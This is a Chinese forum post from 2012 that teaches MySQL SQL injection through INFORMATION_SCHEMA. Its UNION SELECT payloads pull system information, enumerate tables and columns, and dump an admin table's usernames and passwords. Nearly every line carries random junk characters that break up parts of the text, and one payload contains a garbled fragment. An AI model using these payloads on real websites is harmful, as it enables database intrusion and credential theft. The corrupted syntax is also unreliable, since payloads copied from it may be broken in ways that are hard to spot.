本文介绍MYSQL盲注的一些语句和方法
2 t7 D6 v6 \( O6 x4 F, {/ e/ K
6 w8 ~* S9 B- B* `学习盲注前先了解下 IFORMATION_SCHEMA 库
( W0 @+ _, q, M* S( _: e* U. G% z; p+ j
Mysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库,其中记录了Mysql中所有$ }! Z! {$ p% T: W
存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说明。; x+ Q+ \$ ^/ J' X
1.得到所有数据库名:. N3 E. l4 x3 @9 c4 N
|SCHEMATA ->存储数据库名的表$ c3 {! {; N7 c+ Y
|---字段:SCHEMA_NAME ->数据库名称
: X4 T3 @6 R' v- i$ W. o/ v$ c- g) ?: S4 s0 Q2 n
|TABLES ->存储表名
2 O; E, ]; h7 y8 o3 |& e|---字段:TABLE_SCHEMA ->表示该表名属于哪个数据库名
6 Z# F: G5 E n; ^" H3 F|---字段:TABLE_NAME ->存储表的表名) b/ m; w+ f( W" z: ~
$ S$ k1 q g1 s) Y0 }7 f- f|COLUMNS ->存储的字段名表
) M& G( l. \% S0 l4 I5 V- G& @ }|---字段:TABLE_SCHEMA ->该字段所属数据库名
5 J. f- ?/ X! j5 _|---字段:TABLE_NAME ->存储所属表的名称
6 M3 Y% W$ g0 C, ~/ f& l
6 j* e4 `9 }6 p* x' H) y Y|---字段:COLUMN_NAME ->该字段的名称# Q0 O2 t0 l' e
+ n7 N* l3 I+ b( ~+ d2 o
7 E' K# b+ P( j. y
5 b# ^" U( \" N1 f) B* B###########################################################################. ^% y* q5 ]# k) {) M* l( P: h
& P2 v% \( z' z9 y( H+ i' i0 h
0x001 获取系统信息:! E& l3 v9 Z- x7 v% w% |2 A
' W/ V( l) w8 _; Funion select 1,2,3,4,5,concat(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*
( M! j# H& I0 x) R* m: A' L
1 I5 N1 h4 B/ I0 j) _( I$ L0 L/*
/ q1 Y1 g, u+ R1 D% i" q, Q9 u* a. Z, P2 }3 m4 f {
@@global.version_compile_os 获取系统版本
& h c& k! G! i7 u
7 Z) d0 @( k& R" X& F' R@@datadir 数据库路径
) ]8 a0 d6 e4 d) Udatabase() 当前数据库名称0 o- P3 w& d2 R3 t
0x3c62723e 换行HEX值
( G o2 y: ^! E: w* ]" @4 v& t) p* l
*/. a2 G' v- C- z: A
/ ?# a3 b$ L& L3 d% ^4 M 1 e) q6 q$ N0 a" n& x
2 A- }& ?! x! F J0 `
######################################################################: q4 |# w; y* j5 I
6 J; K0 X+ q8 ]! B
0x002 获取表名
- H( C, Q1 l) R& m4 j% w
0 D2 {% S9 `* f1 l# H- O% Ounion select 1,2,group_concat(table_name),4,5,6,7,8,9 from information_schema.tables where table_schema=0x67617264656e /*
1 J4 C6 U+ {/ o$ g/ R, n. }- g2 N9 ^# H" T, d
9 f0 x2 T$ i- K2 E5 D; Y9 _/ s* S6 [+ I: H2 i' e& c( @8 C& I& _# h
/*
# v. r7 k- `/ M- O" u# j, t. f" B; h3 z7 F$ H! M- b
0x67617264656e 为当前数据库名
9 W3 i% k; |7 S3 Q. @- h: E1 G. u. B, V- j
group_concat(table_name) 使用group_concat函数 一步获得该库所有表名
& J; T( a" T8 l, T% K! G0 M/ ?! w# R1 B6 s k' @! b9 h
*/
$ I& x( Y- A7 O0 ^* L/ a4 W! N5 _4 u, f. W: ?( p
######################################################################
% {6 L* y1 }; L' e
) ^# K1 V# o0 Y0 ^) X1 `% u; L
4 @, R3 Q8 M; U7 y' E' \- N' J- Y" l
0x003 获取字段
3 Y* t. ? b3 d1 i3 P
6 W7 z9 Z* u1 g3 s. {union select 1,2,group_concat(column_name),4,5,6,7,8,9 from information_schema.columns where table_name=0x61646d696e and table_schema=0x67617264656e limit 1 /*7 V) u9 x) L, |% q- ~5 m; G
6 A* l( [: f4 T0 N2 i* F1 w% {: t
/*
6 J% m) F# o( y6 T2 g' p$ l" q1 X: D- l; E+ r% C
group_concat(column_name) 同样是 一口气 获得该表(0x61646d696e)所有字段" A* c1 F* ^! M& p! ?# f0 H
: P7 _9 P% Q" U! S1 Q+ B0x61646d696e ->选择一个表
4 g, `* C5 }9 G# K( f( [4 v0 B/ @2 N6 W
0x67617264656e ->数据库名4 R4 e! p- ?% N5 |$ |/ e9 L9 F8 v
) L- k3 e' \# R0 K" s; l) `' Y*/
6 A# ^/ Y, ^; } f. |) { {5 K4 h# Z) S. E: x# ?
#####################################################################
) h6 T. [8 M8 D. D9 Y
, `( C2 X( `, Z. I. w! i $ d0 z: W8 a% s" j9 ?
" j1 n, F+ H: T7 H3 ^4 E( z3 g/ L0x004 获取数据
! I w r5 j# _, j3 r; O" l+ Z- ]% p% v8 f1 N5 e
union select 1,2,31 w: l2 j. L9 I* W
,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin$ G) q7 V8 [3 M
* ?, q B& h6 [8 k/ x& g; m
union select 1,group_concat(id),group_concat(adname),4,5,group_concat(adpassword),6,7,8 from admin
; I+ d' Q$ ~! |7 w- s+ z# c) n
5 ?/ T, J, o$ j2 ?$ a; u * g- i$ `2 U, ?, x$ b- j9 K7 _7 {
6 H, a, u/ L* r/*; R/ y5 R) O# \, A
8 a* _9 X- M$ q0 x, [7 @0x3c62723e 换行符号HEX编码
: k$ O/ h% L/ ^
( U9 s( j/ ~& c( [0 f+ E) g1 `2 b& pgroup_concat 同时获得该字段所有数据" C3 r. V3 v0 O s+ X1 x b
, [1 ~' e, L* P/ K
*/4 t& r) z* F+ n% A
; V6 O+ J* `! E0 s0 O' K) ]) r |
发表于 2012-9-13 17:48:44
收藏
支持
反对